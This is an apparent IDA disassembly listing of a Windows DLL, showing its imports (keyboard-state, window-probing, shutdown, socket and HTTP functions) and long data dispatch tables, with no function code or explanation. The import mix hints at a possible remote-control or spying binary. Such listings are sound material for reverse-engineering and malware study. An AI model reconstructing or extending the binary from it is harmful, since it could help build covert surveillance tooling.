extrn wsprintfA:dword ; CODE XREF: sub_100050D9+249�p
; DATA XREF: sub_100050D9+249�r
; int __stdcall DrawTextA(HDC hdc, LPCSTR lpchText, int cchText, LPRECT lprc, UINT format)
extrn DrawTextA:dword ; CODE XREF: sub_100050D9+1EE�p
; sub_100050D9+265�p
; DATA XREF: ...
; LRESULT __stdcall DispatchMessageA(const MSG *lpMsg)
extrn DispatchMessageA:dword ; CODE XREF: sub_1000537C+20D�p
; DATA XREF: sub_1000537C+20D�r
; BOOL __stdcall TranslateMessage(const MSG *lpMsg)
extrn TranslateMessage:dword ; CODE XREF: sub_1000537C+203�p
; DATA XREF: sub_1000537C+203�r
; UINT_PTR __stdcall SetTimer(HWND hWnd, UINT_PTR nIDEvent, UINT uElapse, TIMERPROC lpTimerFunc)
extrn SetTimer:dword ; CODE XREF: sub_1000537C+1E0�p
; sub_1000AF7F+34�p ...
; int __stdcall FillRect(HDC hDC, const RECT *lprc, HBRUSH hbr)
extrn FillRect:dword ; CODE XREF: sub_1000537C+14C�p
; DATA XREF: sub_1000537C+14C�r
; int __stdcall ReleaseDC(HWND hWnd, HDC hDC)
extrn ReleaseDC:dword ; CODE XREF: sub_1000537C+10C�p
; DATA XREF: sub_1000537C+10C�r
; HDC __stdcall GetDC(HWND hWnd)
extrn GetDC:dword ; CODE XREF: sub_1000537C+55�p
; DATA XREF: sub_1000537C+55�r
; BOOL __stdcall ExitWindowsEx(UINT uFlags, DWORD dwReason)
extrn ExitWindowsEx:dword ; CODE XREF: sub_1000579B+52�p
; DATA XREF: sub_1000579B+52�r
; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
extrn MessageBoxA:dword ; CODE XREF: sub_100105F9+D�p
; DATA XREF: sub_100105F9+D�r
; int __stdcall GetSystemMetrics(int nIndex)
extrn GetSystemMetrics:dword ; CODE XREF: sub_10001DE0+B�p
; sub_10001DE0+1B�p ...
; BOOL __stdcall GetKeyboardState(PBYTE lpKeyState)
extrn GetKeyboardState:dword ; CODE XREF: .text:10004B0E�p
; sub_10004DAA+A8�p
; DATA XREF: ...
; BOOL __stdcall GetMessageA(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax)
extrn GetMessageA:dword ; CODE XREF: sub_1000537C+1F5�p
; DATA XREF: sub_1000537C+1F5�r
; int __stdcall GetClassNameA(HWND hWnd, LPSTR lpClassName, int nMaxCount)
extrn GetClassNameA:dword ; CODE XREF: sub_10001D30+19�p
; .text:10001DA8�p ...
; BOOL __stdcall EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam)
extrn EnumChildWindows:dword ; CODE XREF: .text:10001DCF�p
; .text:100020A4�p
; DATA XREF: ...
; LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn SendMessageA:dword ; CODE XREF: sub_10001DE0+E2�p
; sub_10001DE0+129�p ...
; HWND __stdcall WindowFromPoint(POINT Point)
extrn WindowFromPoint:dword ; CODE XREF: sub_10001DE0+50�p
; sub_10004960+5E�p ...
;
; Imports from WININET.dll
;
extrn InternetSetStatusCallback:dword ; DATA XREF: sub_1000FDDB+16D�r
extrn HttpSendRequestExA:dword ; DATA XREF: sub_1000FDDB+13F�r
extrn InternetQueryDataAvailable:dword ; DATA XREF: sub_1000FDDB+129�r
extrn HttpSendRequestA:dword ; DATA XREF: sub_1000FDDB+113�r
extrn HttpSendRequestW:dword ; DATA XREF: sub_1000FDDB+FB�r
extrn HttpOpenRequestA:dword ; DATA XREF: sub_1000FDDB+E5�r
extrn InternetOpenUrlA:dword ; DATA XREF: sub_1000FDDB+CF�r
extrn InternetReadFileExA:dword ; DATA XREF: sub_1000FDDB+B7�r
extrn InternetWriteFile:dword ; DATA XREF: sub_1000FDDB+A1�r
extrn InternetReadFile:dword ; DATA XREF: sub_1000FDDB+8B�r
extrn InternetConnectA:dword ; CODE XREF: sub_10011E49+450�p
; DATA XREF: sub_1000FDDB+5D�r ...
extrn GetUrlCacheEntryInfoA:dword ; DATA XREF: sub_1000FDDB+47�r
extrn InternetCloseHandle:dword ; CODE XREF: sub_10011E49+388�p
; DATA XREF: sub_10011E49+388�r
extrn InternetQueryOptionA:dword ; CODE XREF: sub_10011E49+17F�p
; sub_10011E49+3A2�p ...
;
; Imports from WS2_32.dll
;
; int __stdcall WSAIoctl(SOCKET s, DWORD dwIoControlCode, LPVOID lpvInBuffer, DWORD cbInBuffer, LPVOID lpvOutBuffer, DWORD cbOutBuffer, LPDWORD lpcbBytesReturned, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine)
extrn WSAIoctl:dword ; CODE XREF: sub_10014B0F+23A�p
; sub_10016C4C+2C3�p
; DATA XREF: ...
; int __stdcall getsockname(SOCKET s, struct sockaddr *name, int *namelen)
extrn getsockname:dword ; CODE XREF: sub_10014769+8E�p
; sub_10014871+4C�p
; DATA XREF: ...
; int __stdcall WSAGetLastError()
extrn WSAGetLastError:dword ; CODE XREF: sub_100142FF+A7�p
; DATA XREF: sub_100142FF+A7�r
; int __stdcall getpeername(SOCKET s, struct sockaddr *name, int *namelen)
extrn getpeername:dword ; CODE XREF: sub_10011AA3+FA�p
; sub_10011CA2+A8�p
; DATA XREF: ...
; struct hostent *__stdcall gethostbyaddr(const char *addr, int len, int type)
extrn gethostbyaddr:dword ; CODE XREF: sub_10011AA3+112�p
; sub_10011CA2+C0�p
; DATA XREF: ...
; int __stdcall WSASend(SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine)
extrn WSASend:dword ; DATA XREF: sub_1000FDDB+19B�r
; int __stdcall send(SOCKET s, const char *buf, int len, int flags)
extrn send:dword ; CODE XREF: sub_10005E66+27A�p
; StartAddress+4AB�p ...
; int __stdcall select(int nfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, const struct timeval *timeout)
extrn select:dword ; CODE XREF: sub_10005E66+33A�p
; sub_10005E66+4F0�p ...
; int __stdcall recv(SOCKET s, char *buf, int len, int flags)
extrn recv:dword ; CODE XREF: sub_10005E66+373�p
; sub_10005E66+50F�p ...
; int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: sub_10005BE3+A3�p
; sub_10005E66+131�p ...
; struct hostent *__stdcall gethostbyname(const char *name)
extrn gethostbyname:dword ; CODE XREF: sub_10005BE3+CF�p
; sub_10005E66+167�p ...
; u_short __stdcall htons(u_short hostshort)
extrn htons:dword ; CODE XREF: sub_10005BE3+12A�p
; sub_10005E66+1C2�p ...
; SOCKET __stdcall socket(int af, int type, int protocol)
extrn socket:dword ; CODE XREF: sub_10005BE3+13F�p
; sub_10005E66+1D7�p ...
; int __stdcall connect(SOCKET s, const struct sockaddr *name, int namelen)
extrn connect:dword ; CODE XREF: sub_10005BE3+1F2�p
; sub_10005E66+205�p ...
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_10005BE3+218�p
; sub_10005BE3+24D�p ...
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_10016C4C+325�p
; DATA XREF: sub_10016C4C+325�r
;
; Imports from ole32.dll
;
; HRESULT __stdcall CLSIDFromString(LPOLESTR lpsz, LPCLSID pclsid)
extrn CLSIDFromString:dword ; CODE XREF: sub_10003645+B8�p
; DATA XREF: sub_10003645+B8�r
; HRESULT __stdcall CoInitialize(LPVOID pvReserved)
extrn CoInitialize:dword ; CODE XREF: sub_10003541+33�p
; sub_10003645+A�p
; DATA XREF: ...
; void __stdcall CoUninitialize()
extrn CoUninitialize:dword ; CODE XREF: sub_10003541:loc_100035C0�p
; sub_10003645+92�p ...
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 1001E444h
align 10h
off_1001E450 dd offset sub_1000D1C0 ; DATA XREF: sub_1000D1A0+A�o
; sub_1000D2B0+A�o ...
dd offset sub_1000D200
off_1001E458 dd offset sub_1000D3A0 ; DATA XREF: strstreambuf::strstreambuf(char *,int,char *)+30�o
; std::strstreambuf::strstreambuf(char *,int,char *)+2E�o
dd offset sub_1000D200
off_1001E460 dd offset sub_1000EB00 ; DATA XREF: sub_1000EA00+2C�o
; sub_1000EA94+A�o
align 8
dword_1001E468 dd 0FFFFFFFFh dd offset loc_1000EA69
dd offset loc_1000EA6F
align 8
dword_1001E478 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 8
dword_1001E488 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 8
dword_1001E498 dd 0FFFFFFFFh, 0 dd offset nullsub_3
align 8
dword_1001E4A8 dd 0FFFFFFFFh, 0 dd offset nullsub_4
align 8
dword_1001E4B8 dd 0FFFFFFFFh, 0 dd offset nullsub_5
align 8
dword_1001E4C8 dd 0FFFFFFFFh, 0 dd offset nullsub_6
align 8
dword_1001E4D8 dd 0FFFFFFFFh, 0 dd offset nullsub_7
align 8
dword_1001E4E8 dd 0FFFFFFFFh, 0 dd offset nullsub_8
align 8
dword_1001E4F8 dd 0FFFFFFFFh, 0 dd offset nullsub_9
align 8
dword_1001E508 dd 0FFFFFFFFh, 0 dd offset nullsub_10
align 8
dword_1001E518 dd 0FFFFFFFFh, 0 dd offset sub_100105F9
align 8
dword_1001E528 dd 0FFFFFFFFh, 0 dd offset sub_1001087A
align 8
dword_1001E538 dd 0FFFFFFFFh, 0 dd offset nullsub_11
align 8
dword_1001E548 dd 0FFFFFFFFh, 0 dd offset nullsub_12
align 8
dword_1001E558 dd 0FFFFFFFFh, 0 dd offset nullsub_13
align 8
dword_1001E568 dd 0FFFFFFFFh, 0 dd offset nullsub_14
align 8
dword_1001E578 dd 0FFFFFFFFh, 0 dd offset nullsub_15
align 8
dword_1001E588 dd 0FFFFFFFFh, 0 dd offset nullsub_16
align 8
dword_1001E598 dd 0FFFFFFFFh, 0 dd offset nullsub_17
align 8
dword_1001E5A8 dd 0FFFFFFFFh, 0 dd offset nullsub_18
align 8
dword_1001E5B8 dd 0FFFFFFFFh, 0 dd offset nullsub_19
align 8
dword_1001E5C8 dd 0FFFFFFFFh dd offset loc_100176D5
dd offset loc_100176D9
align 8
dword_1001E5D8 dd 0FFFFFFFFh dd offset loc_1001803D
dd offset loc_10018041
align 8
dword_1001E5E8 dd 2ED7A3FFh, 4A8D3339h, 98D45C80h, 8FC23F15hdword_1001E5F8 dd 0FFFFFFFFh dd offset loc_10018201
dd offset loc_10018205
align 8
dword_1001E608 dd 0FFFFFFFFh dd offset loc_10018303
dd offset loc_10018307
align 8
dword_1001E618 dd 0FFFFFFFFh dd offset loc_10018436
dd offset loc_1001843A
align 8
byte_1001E628 db 0 ; DATA XREF: sub_10018621+59�r
align 4
dd 2411h, 0
dd 2411h, 0
dd 2411h, 0
dd 2411h, 0
dd 2411h, 0
dd 2411h, 0
dd 2411h, 0
dd 2411h, 1010101h, 1010102h, 1010101h, 1010102h, 1010101h
dd 1010102h, 1010101h, 1010102h, 1010101h, 1010102h, 1010101h
dd 1010102h, 1010101h, 1010102h, 1010101h, 1010102h, 4040404h
dd 4040405h, 4040404h, 4040405h, 4040404h, 4040405h, 4040404h
dd 4040405h, 4040404h, 4040405h, 4040404h, 4040405h, 4040404h
dd 4040405h, 4040404h, 4040405h, 10h dup(0)
dword_1001E728 dd 12200h ; sub_10018714+20�o
dd offset sub_10018621
dd 12201h
dd offset sub_10018621
dd 12202h
dd offset sub_10018621
dd 12203h
dd offset sub_10018621
dd 2204h
dd offset sub_10018621
dd 3505h
dd offset sub_10018621
dd 1106h
dd offset sub_10018621
dd 1107h
dd offset sub_10018621
dd 12208h
dd offset sub_10018621
dd 12209h
dd offset sub_10018621
dd 1220Ah
dd offset sub_10018621
dd 1220Bh
dd offset sub_10018621
dd 220Ch
dd offset sub_10018621
dd 350Dh
dd offset sub_10018621
dd 110Eh
dd offset sub_10018621
dd 110Fh
dd offset sub_100187F7
dd 12210h
dd offset sub_10018621
dd 12211h
dd offset sub_10018621
dd 12212h
dd offset sub_10018621
dd 12213h
dd offset sub_10018621
dd 2214h
dd offset sub_10018621
dd 3515h
dd offset sub_10018621
dd 1116h
dd offset sub_10018621
dd 1117h
dd offset sub_10018621
dd 12218h
dd offset sub_10018621
dd 12219h
dd offset sub_10018621
dd 1221Ah
dd offset sub_10018621
dd 1221Bh
dd offset sub_10018621
dd 221Ch
dd offset sub_10018621
dd 351Dh
dd offset sub_10018621
dd 111Eh
dd offset sub_10018621
dd 111Fh
dd offset sub_10018621
dd 12220h
dd offset sub_10018621
dd 12221h
dd offset sub_10018621
dd 12222h
dd offset sub_10018621
dd 12223h
dd offset sub_10018621
dd 2224h
dd offset sub_10018621
dd 3525h
dd offset sub_10018621
dd 1126h
dd offset sub_10018714
dd 1127h
dd offset sub_10018621
dd 12228h
dd offset sub_10018621
dd 12229h
dd offset sub_10018621
dd 1222Ah
dd offset sub_10018621
dd 1222Bh
dd offset sub_10018621
dd 222Ch
dd offset sub_10018621
dd 352Dh
dd offset sub_10018621
dd 112Eh
dd offset sub_10018714
dd 112Fh
dd offset sub_10018621
dd 12230h
dd offset sub_10018621
dd 12231h
dd offset sub_10018621
dd 12232h
dd offset sub_10018621
dd 12233h
dd offset sub_10018621
dd 2234h
dd offset sub_10018621
dd 3535h
dd offset sub_10018621
dd 1136h
dd offset sub_10018714
dd 1137h
dd offset sub_10018621
dd 12238h
dd offset sub_10018621
dd 12239h
dd offset sub_10018621
dd 1223Ah
dd offset sub_10018621
dd 1223Bh
dd offset sub_10018621
dd 223Ch
dd offset sub_10018621
dd 353Dh
dd offset sub_10018621
dd 113Eh
dd offset sub_10018714
dd 113Fh
dd offset sub_10018621
dd 1140h
dd offset sub_10018621
dd 1141h
dd offset sub_10018621
dd 1142h
dd offset sub_10018621
dd 1143h
dd offset sub_10018621
dd 1144h
dd offset sub_10018621
dd 1145h
dd offset sub_10018621
dd 1146h
dd offset sub_10018621
dd 1147h
dd offset sub_10018621
dd 1148h
dd offset sub_10018621
dd 1149h
dd offset sub_10018621
dd 114Ah
dd offset sub_10018621
dd 114Bh
dd offset sub_10018621
dd 114Ch
dd offset sub_10018621
dd 114Dh
dd offset sub_10018621
dd 114Eh
dd offset sub_10018621
dd 114Fh
dd offset sub_10018621
dd 1150h
dd offset sub_10018621
dd 1151h
dd offset sub_10018621
dd 1152h
dd offset sub_10018621
dd 1153h
dd offset sub_10018621
dd 1154h
dd offset sub_10018621
dd 1155h
dd offset sub_10018621
dd 1156h
dd offset sub_10018621
dd 1157h
dd offset sub_10018621
dd 1158h
dd offset sub_10018621
dd 1159h
dd offset sub_10018621
dd 115Ah
dd offset sub_10018621
dd 115Bh
dd offset sub_10018621
dd 115Ch
dd offset sub_10018621
dd 115Dh
dd offset sub_10018621
dd 115Eh
dd offset sub_10018621
dd 115Fh
dd offset sub_10018621
dd 1160h
dd offset sub_10018621
dd 1161h
dd offset sub_10018621
dd 12262h
dd offset sub_10018621
dd 12263h
dd offset sub_10018621
dd 1164h
dd offset sub_10018714
dd 1165h
dd offset sub_10018714
dd 1166h
dd offset sub_1001882C
dd 1167h
dd offset sub_10018846
dd 3568h
dd offset sub_10018621
dd 4014669h
dd offset sub_10018621
dd 226Ah
dd offset sub_10018621
dd 101336Bh
dd offset sub_10018621
dd 116Ch
dd offset sub_10018621
dd 116Dh
dd offset sub_10018621
dd 116Eh
dd offset sub_10018621
dd 116Fh
dd offset sub_10018621
dd 102270h
dd offset sub_10018621
dd 102271h
dd offset sub_10018621
dd 102272h
dd offset sub_10018621
dd 102273h
dd offset sub_10018621
dd 102274h
dd offset sub_10018621
dd 102275h
dd offset sub_10018621
dd 102276h
dd offset sub_10018621
dd 102277h
dd offset sub_10018621
dd 102278h
dd offset sub_10018621
dd 102279h
dd offset sub_10018621
dd 10227Ah
dd offset sub_10018621
dd 10227Bh
dd offset sub_10018621
dd 10227Ch
dd offset sub_10018621
dd 10227Dh
dd offset sub_10018621
dd 10227Eh
dd offset sub_10018621
dd 10227Fh
dd offset sub_10018621
dd 1013380h
dd offset sub_10018621
dd 4014681h
dd offset sub_10018621
dd 2282h
dd offset sub_10018621
dd 1013383h
dd offset sub_10018621
dd 12284h
dd offset sub_10018621
dd 12285h
dd offset sub_10018621
dd 12286h
dd offset sub_10018621
dd 12287h
dd offset sub_10018621
dd 12288h
dd offset sub_10018621
dd 12289h
dd offset sub_10018621
dd 1228Ah
dd offset sub_10018621
dd 1228Bh
dd offset sub_10018621
dd 1228Ch
dd offset sub_10018621
dd 1228Dh
dd offset sub_10018621
dd 1228Eh
dd offset sub_10018621
dd 1228Fh
dd offset sub_10018621
dd 1190h
dd offset sub_10018621
dd 1191h
dd offset sub_10018621
dd 1192h
dd offset sub_10018621
dd 1193h
dd offset sub_10018621
dd 1194h
dd offset sub_10018621
dd 1195h
dd offset sub_10018621
dd 1196h
dd offset sub_10018621
dd 1197h
dd offset sub_10018621
dd 1198h
dd offset sub_10018621
dd 1199h
dd offset sub_10018621
dd 1000579Ah
dd offset sub_10018621
dd 119Bh
dd offset sub_10018621
dd 119Ch
dd offset sub_10018621
dd 119Dh
dd offset sub_10018621
dd 119Eh
dd offset sub_10018621
dd 119Fh
dd offset sub_10018621
dd 200035A0h
dd offset sub_10018621
dd 200035A1h
dd offset sub_10018621
dd 200035A2h
dd offset sub_10018621
dd 200035A3h
dd offset sub_10018621
dd 11A4h
dd offset sub_10018621
dd 11A5h
dd offset sub_10018621
dd 11A6h
dd offset sub_10018621
dd 11A7h
dd offset sub_10018621
dd 22A8h
dd offset sub_10018621
dd 35A9h
dd offset sub_10018621
dd 11AAh
dd offset sub_10018621
dd 11ABh
dd offset sub_10018621
dd 11ACh
dd offset sub_10018621
dd 11ADh
dd offset sub_10018621
dd 11AEh
dd offset sub_10018621
dd 11AFh
dd offset sub_10018621
dd 22B0h
dd offset sub_10018621
dd 22B1h
dd offset sub_10018621
dd 22B2h
dd offset sub_10018621
dd 22B3h
dd offset sub_10018621
dd 22B4h
dd offset sub_10018621
dd 22B5h
dd offset sub_10018621
dd 22B6h
dd offset sub_10018621
dd 22B7h
dd offset sub_10018621
dd 800035B8h
dd offset sub_10018621
dd 35B9h
dd offset sub_10018621
dd 35BAh
dd offset sub_10018621
dd 35BBh
dd offset sub_10018621
dd 35BCh
dd offset sub_10018621
dd 35BDh
dd offset sub_10018621
dd 35BEh
dd offset sub_10018621
dd 35BFh
dd offset sub_10018621
dd 10133C0h
dd offset sub_10018621
dd 10133C1h
dd offset sub_10018621
dd 33C2h
dd offset sub_10018621
dd 11C3h
dd offset sub_10018621
dd 122C4h
dd offset sub_10018621
dd 122C5h
dd offset sub_10018621
dd 10133C6h
dd offset sub_10018621
dd 40146C7h
dd offset sub_10018621
dd 44C8h
dd offset sub_10018621
dd 11C9h
dd offset sub_10018621
dd 100033CAh
dd offset sub_10018621
dd 100011CBh
dd offset sub_10018621
dd 100011CCh
dd offset sub_10018621
dd 100022CDh
dd offset sub_10018621
dd 100011CEh
dd offset sub_10018621
dd 100011CFh
dd offset sub_10018621
dd 122D0h
dd offset sub_10018621
dd 122D1h
dd offset sub_10018621
dd 122D2h
dd offset sub_10018621
dd 122D3h
dd offset sub_10018621
dd 22D4h
dd offset sub_10018621
dd 22D5h
dd offset sub_10018621
dd 11D6h
dd offset sub_100187EF
dd 11D7h
dd offset sub_10018621
dd 122D8h
dd offset sub_10018621
dd 122D9h
dd offset sub_10018621
dd 122DAh
dd offset sub_10018621
dd 122DBh
dd offset sub_10018621
dd 122DCh
dd offset sub_10018621
dd 122DDh
dd offset sub_10018621
dd 122DEh
dd offset sub_10018621
dd 122DFh
dd offset sub_10018621
dd 401022E0h
dd offset sub_10018621
dd 401022E1h
dd offset sub_10018621
dd 401022E2h
dd offset sub_10018621
dd 1022E3h
dd offset sub_10018621
dd 22E4h
dd offset sub_10018621
dd 22E5h
dd offset sub_10018621
dd 22E6h
dd offset sub_10018621
dd 22E7h
dd offset sub_10018621
dd 1035E8h
dd offset sub_10018621
dd 1035E9h
dd offset sub_10018621
dd 100057EAh
dd offset sub_10018621
dd 1022EBh
dd offset sub_10018621
dd 11ECh
dd offset sub_10018621
dd 11EDh
dd offset sub_10018621
dd 11EEh
dd offset sub_10018621
dd 11EFh
dd offset sub_10018621
dd 11F0h
dd offset sub_10018714
dd 11F1h
dd offset sub_100187EF
dd 11F2h
dd offset sub_10018714
dd 11F3h
dd offset sub_10018714
dd 11F4h
dd offset sub_10018621
dd 11F5h
dd offset sub_10018621
dd 0F6h
dd offset sub_10018861
dd 0F7h
dd offset sub_100188A6
dd 11F8h
dd offset sub_10018621
dd 11F9h
dd offset sub_10018621
dd 11FAh
dd offset sub_10018621
dd 11FBh
dd offset sub_10018621
dd 11FCh
dd offset sub_10018621
dd 11FDh
dd offset sub_10018621
dd 122FEh
dd offset sub_10018621
dd 0FFh
dd offset sub_100188EB
align 10h
dword_1001EF30 dd 12200h dd offset sub_10018621
dd 12201h
dd offset sub_10018621
dd 12202h
dd offset sub_10018621
dd 12203h
dd offset sub_10018621
dd 1104h
dd offset sub_100187EF
dd 1105h
dd offset sub_100187EF
dd 2206h
dd offset sub_10018621
dd 1107h
dd offset sub_100187EF
dd 2208h
dd offset sub_10018621
dd 2209h
dd offset sub_10018621
dd 110Ah
dd offset sub_100187EF
dd 220Bh
dd offset sub_10018621
dd 110Ch
dd offset sub_100187EF
dd 1220Dh
dd offset sub_10018621
dd 220Eh
dd offset sub_10018621
dd 2330Fh
dd offset sub_10018621
dd 12210h
dd offset sub_10018621
dd 12211h
dd offset sub_10018621
dd 12212h
dd offset sub_10018621
dd 12213h
dd offset sub_10018621
dd 12214h
dd offset sub_10018621
dd 12215h
dd offset sub_10018621
dd 12216h
dd offset sub_10018621
dd 12217h
dd offset sub_10018621
dd 12218h
dd offset sub_10018621
dd 1119h
dd offset sub_100187EF
dd 111Ah
dd offset sub_100187EF
dd 111Bh
dd offset sub_100187EF
dd 111Ch
dd offset sub_100187EF
dd 111Dh
dd offset sub_100187EF
dd 111Eh
dd offset sub_100187EF
dd 111Fh
dd offset sub_100187EF
dd 12220h
dd offset sub_10018621
dd 12221h
dd offset sub_10018621
dd 12222h
dd offset sub_10018621
dd 12223h
dd offset sub_10018621
dd 1124h
dd offset sub_100187EF
dd 1125h
dd offset sub_100187EF
dd 1126h
dd offset sub_100187EF
dd 1127h
dd offset sub_100187EF
dd 12228h
dd offset sub_10018621
dd 12229h
dd offset sub_10018621
dd 1222Ah
dd offset sub_10018621
dd 1222Bh
dd offset sub_10018621
dd 1222Ch
dd offset sub_10018621
dd 1222Dh
dd offset sub_10018621
dd 1222Eh
dd offset sub_10018621
dd 1222Fh
dd offset sub_10018621
dd 2230h
dd offset sub_10018621
dd 2231h
dd offset sub_10018621
dd 2232h
dd offset sub_10018621
dd 2233h
dd offset sub_10018621
dd 2234h
dd offset sub_10018621
dd 2235h
dd offset sub_10018621
dd 1136h
dd offset sub_100187EF
dd 1137h
dd offset sub_100187EF
dd 1138h
dd offset sub_100187EF
dd 1139h
dd offset sub_100187EF
dd 113Ah
dd offset sub_100187EF
dd 113Bh
dd offset sub_100187EF
dd 113Ch
dd offset sub_100187EF
dd 113Dh
dd offset sub_100187EF
dd 113Eh
dd offset sub_100187EF
dd 113Fh
dd offset sub_100187EF
dd 12240h
dd offset sub_10018621
dd 12241h
dd offset sub_10018621
dd 12242h
dd offset sub_10018621
dd 12243h
dd offset sub_10018621
dd 12244h
dd offset sub_10018621
dd 12245h
dd offset sub_10018621
dd 12246h
dd offset sub_10018621
dd 12247h
dd offset sub_10018621
dd 12248h
dd offset sub_10018621
dd 12249h
dd offset sub_10018621
dd 1224Ah
dd offset sub_10018621
dd 1224Bh
dd offset sub_10018621
dd 1224Ch
dd offset sub_10018621
dd 1224Dh
dd offset sub_10018621
dd 1224Eh
dd offset sub_10018621
dd 1224Fh
dd offset sub_10018621
dd 12250h
dd offset sub_10018621
dd 12251h
dd offset sub_10018621
dd 12252h
dd offset sub_10018621
dd 12253h
dd offset sub_10018621
dd 12254h
dd offset sub_10018621
dd 12255h
dd offset sub_10018621
dd 12256h
dd offset sub_10018621
dd 12257h
dd offset sub_10018621
dd 12258h
dd offset sub_10018621
dd 12259h
dd offset sub_10018621
dd 1225Ah
dd offset sub_10018621
dd 1225Bh
dd offset sub_10018621
dd 1225Ch
dd offset sub_10018621
dd 1225Dh
dd offset sub_10018621
dd 1225Eh
dd offset sub_10018621
dd 1225Fh
dd offset sub_10018621
dd 12260h
dd offset sub_10018621
dd 12261h
dd offset sub_10018621
dd 12262h
dd offset sub_10018621
dd 12263h
dd offset sub_10018621
dd 12264h
dd offset sub_10018621
dd 12265h
dd offset sub_10018621
dd 12266h
dd offset sub_10018621
dd 12267h
dd offset sub_10018621
dd 12268h
dd offset sub_10018621
dd 12269h
dd offset sub_10018621
dd 1226Ah
dd offset sub_10018621
dd 1226Bh
dd offset sub_10018621
dd 1226Ch
dd offset sub_10018621
dd 1226Dh
dd offset sub_10018621
dd 1226Eh
dd offset sub_10018621
dd 1226Fh
dd offset sub_10018621
dd 1013370h
dd offset sub_10018621
dd 1013371h
dd offset sub_10018621
dd 1013372h
dd offset sub_10018621
dd 1013373h
dd offset sub_10018621
dd 12274h
dd offset sub_10018621
dd 12275h
dd offset sub_10018621
dd 12276h
dd offset sub_10018621
dd 2277h
dd offset sub_10018621
dd 1178h
dd offset sub_100187EF
dd 1179h
dd offset sub_100187EF
dd 117Ah
dd offset sub_100187EF
dd 117Bh
dd offset sub_100187EF
dd 117Ch
dd offset sub_100187EF
dd 117Dh
dd offset sub_100187EF
dd 1227Eh
dd offset sub_10018621
dd 1227Fh
dd offset sub_10018621
dd 103580h
dd offset sub_10018621
dd 103581h
dd offset sub_10018621
dd 103582h
dd offset sub_10018621
dd 103583h
dd offset sub_10018621
dd 103584h
dd offset sub_10018621
dd 103585h
dd offset sub_10018621
dd 103586h
dd offset sub_10018621
dd 103587h
dd offset sub_10018621
dd 103588h
dd offset sub_10018621
dd 103589h
dd offset sub_10018621
dd 10358Ah
dd offset sub_10018621
dd 10358Bh
dd offset sub_10018621
dd 10358Ch
dd offset sub_10018621
dd 10358Dh
dd offset sub_10018621
dd 10358Eh
dd offset sub_10018621
dd 10358Fh
dd offset sub_10018621
dd 12290h
dd offset sub_10018621
dd 12291h
dd offset sub_10018621
dd 12292h
dd offset sub_10018621
dd 12293h
dd offset sub_10018621
dd 12294h
dd offset sub_10018621
dd 12295h
dd offset sub_10018621
dd 12296h
dd offset sub_10018621
dd 12297h
dd offset sub_10018621
dd 12298h
dd offset sub_10018621
dd 12299h
dd offset sub_10018621
dd 1229Ah
dd offset sub_10018621
dd 1229Bh
dd offset sub_10018621
dd 1229Ch
dd offset sub_10018621
dd 1229Dh
dd offset sub_10018621
dd 1229Eh
dd offset sub_10018621
dd 1229Fh
dd offset sub_10018621
dd 22A0h
dd offset sub_10018621
dd 22A1h
dd offset sub_10018621
dd 22A2h
dd offset sub_10018621
dd 122A3h
dd offset sub_10018621
dd 10133A4h
dd offset sub_10018621
dd 122A5h
dd offset sub_10018621
dd 11A6h
dd offset sub_100187EF
dd 11A7h
dd offset sub_100187EF
dd 22A8h
dd offset sub_10018621
dd 22A9h
dd offset sub_10018621
dd 22AAh
dd offset sub_10018621
dd 122ABh
dd offset sub_10018621
dd 10133ACh
dd offset sub_10018621
dd 122ADh
dd offset sub_10018621
dd 122AEh
dd offset sub_10018621
dd 122AFh
dd offset sub_10018621
dd 122B0h
dd offset sub_10018621
dd 122B1h
dd offset sub_10018621
dd 122B2h
dd offset sub_10018621
dd 122B3h
dd offset sub_10018621
dd 122B4h
dd offset sub_10018621
dd 122B5h
dd offset sub_10018621
dd 122B6h
dd offset sub_10018621
dd 122B7h
dd offset sub_10018621
dd 11B8h
dd offset sub_100187EF
dd 11B9h
dd offset sub_100187EF
dd 10133BAh
dd offset sub_10018621
dd 122BBh
dd offset sub_10018621
dd 122BCh
dd offset sub_10018621
dd 122BDh
dd offset sub_10018621
dd 122BEh
dd offset sub_10018621
dd 122BFh
dd offset sub_10018621
dd 122C0h
dd offset sub_10018621
dd 122C1h
dd offset sub_10018621
dd 122C2h
dd offset sub_10018621
dd 122C3h
dd offset sub_10018621
dd 10133C4h
dd offset sub_10018621
dd 10133C5h
dd offset sub_10018621
dd 10133C6h
dd offset sub_10018621
dd 122C7h
dd offset sub_10018621
dd 22C8h
dd offset sub_10018621
dd 22C9h
dd offset sub_10018621
dd 22CAh
dd offset sub_10018621
dd 22CBh
dd offset sub_10018621
dd 22CCh
dd offset sub_10018621
dd 22CDh
dd offset sub_10018621
dd 22CEh
dd offset sub_10018621
dd 22CFh
dd offset sub_10018621
dd 11D0h
dd offset sub_100187EF
dd 122D1h
dd offset sub_10018621
dd 122D2h
dd offset sub_10018621
dd 122D3h
dd offset sub_10018621
dd 122D4h
dd offset sub_10018621
dd 122D5h
dd offset sub_10018621
dd 122D6h
dd offset sub_10018621
dd 122D7h
dd offset sub_10018621
dd 122D8h
dd offset sub_10018621
dd 122D9h
dd offset sub_10018621
dd 122DAh
dd offset sub_10018621
dd 122DBh
dd offset sub_10018621
dd 122DCh
dd offset sub_10018621
dd 122DDh
dd offset sub_10018621
dd 122DEh
dd offset sub_10018621
dd 122DFh
dd offset sub_10018621
dd 122E0h
dd offset sub_10018621
dd 122E1h
dd offset sub_10018621
